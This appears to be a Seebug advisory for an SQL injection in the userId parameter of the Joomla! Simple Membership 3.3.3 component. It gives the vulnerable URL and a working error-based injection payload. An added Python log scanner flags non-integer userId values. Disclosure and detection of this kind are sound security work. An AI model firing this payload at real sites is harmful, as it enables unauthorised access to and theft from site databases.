Joomla! Component Simple Membership 3.3.3 - 'userId' Parameter SQL Injection

2017-03-29T00:00:00
ID SSV:92848
Type seebug
Reporter Z3r0yu
Modified 2017-03-29T00:00:00

Description

Joomla! Component Simple Membership 3.3.3 - 'userId' Parameter SQL Injection

Joomla! Component Simple Membership 3.3.3 does not strictly filter the userId parameter, which leads to an SQL injection vulnerability. If the target server has error display turned on, the flaw can be used directly through error-based injection. If error display is turned off, time-based and Boolean blind injection can be used. UNION injection also works.

Google Dork:

N/A

Injection point:

http://localhost/[PATH]/index.php?option=com_simplemembership&Itemid=1&task=showUsersProfile&userId=[SQL]

Payload:

/index.php?option=com_simplemembership&Itemid=1&task=showUsersProfile&userId=1 AND (SELECT 1747 FROM(SELECT COUNT(*),CONCAT(md5(233),0x71716a6a71,(SELECT (ELT(1747=1747,1))),0x716a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
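A log check for the injection point above, added here as an example (it is not part of the original advisory or the component's code): it flags showUsersProfile requests whose userId is anything other than a plain integer. The combined-log layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Request field of a combined-format access log line (assumed log layout).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# The only shape a legitimate numeric userId should have.
USER_ID_RE = re.compile(r"[0-9]{1,10}")

# Constructed sample lines, not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Mar/2017:10:00:01 +0000] "GET /index.php?option=com_simplemembership'
    '&Itemid=1&task=showUsersProfile&userId=42 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [29/Mar/2017:10:00:07 +0000] "GET /index.php?option=com_simplemembership'
    '&Itemid=1&task=showUsersProfile&userId=1%20AND%201%3D1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [29/Mar/2017:10:00:09 +0000] "GET /index.php?option=com_content'
    '&view=article&id=7 HTTP/1.1" 200 900',
]


def last(query, name):
    """PHP keeps the last value of a repeated parameter; mirror that here."""
    return query.get(name, [""])[-1].lower()


def suspicious_user_id(target):
    """Return the decoded userId if `target` is a Simple Membership
    showUsersProfile request with a non-integer userId, else None."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if last(query, "option") != "com_simplemembership":
        return None
    if last(query, "task") != "showusersprofile":
        return None
    for value in query.get("userId", []):  # check every repeated value
        if not USER_ID_RE.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (line_number, decoded userId) for each log line to review."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        value = suspicious_user_id(match.group(1)) if match else None
        if value is not None:
            hits.append((number, value))
    return hits
```

Requests that carry userId in a POST body do not appear in access logs, so the same integer-only check belongs in the application or WAF layer as well.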


Other types of injection: